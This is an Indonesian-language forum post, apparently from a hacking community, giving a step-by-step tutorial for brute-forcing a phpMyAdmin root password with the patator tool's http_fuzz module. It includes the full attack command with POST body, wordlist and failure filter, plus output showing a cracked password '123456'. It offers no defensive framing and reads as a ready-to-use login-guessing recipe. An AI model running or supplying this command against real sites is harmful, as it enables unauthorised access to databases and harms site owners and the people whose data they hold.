halo semua, kali ini saya akan menshare sesuatu nih.. tentang bruteforce / menebak paksa..
bruteforce ini mayoritas tingkat keberhasilanya di tentukan oleh wordlist.. ckck.. semakin unik semakin banyak semakin besar kesempatan hehe...
oke tanpa basa basi .. cekidot..
1. download dulu patatornya gan
Link di bawah ini: KLIK
2. setelah selesai letakan file itu di mana saja kalian mau ckck.. asal ingat dimana letaknya tadi.. hehe..
3. open console kalian..
lalu ketikan python patator.py,
lalu akan keluar tampilan seperti di gambar paling atas.. hehe...
4. di sana keluar banyak fitur, karna kita sekarang sedang membahas brute phpmyadmin jadi kita pilih fitur http_fuzzer.
dengan mengetikan perintah:
python patator.py http_fuzz
alhasil akan keluar seperti ini..
5. jika sudah joo.. kita mulai execute scriptnya... dengan mengetikan perintah ..
Code:
python patator.py http_fuzz url=http://situs.com/phpmyadmin/index.php method=POST body='pma_username=root&pma_password=FILE0&server=1&lang=en' 0=pass.txt follow=1 accept_cookie=1 -x ignore:fgrep='Cannot log in to the MySQL server'
body= diisi dengan parameter post di phpmyadmin..
apa itu $POST.. ada di postingan ane yg lagi ngebahas sqlmap..
0=wordlistnya.txt << ini adalah untuk input wordlistnya..
6. tarrraaa...
ini berhasil bro...
19:45:38 patator INFO - 200 43646:0 0.032 | 123456 | 13 | HTTP/1.1 200 OK
password: 123456...
^_^ gomen gomen kalau ada slah salah kata atau perumpamaan atau bahasa bahasa progam yg absurd ckck...
karna ane ini juga baru belajar hehe..
![[Image: rTLET65.png]](http://img.prntscr.com/img?url=http://i.imgur.com/rTLET65.png)
![[Image: gDeWBBZ.png]](http://img.prntscr.com/img?url=http://i.imgur.com/gDeWBBZ.png)
![[Image: zHePEYI.png]](http://img.prntscr.com/img?url=http://i.imgur.com/zHePEYI.png)
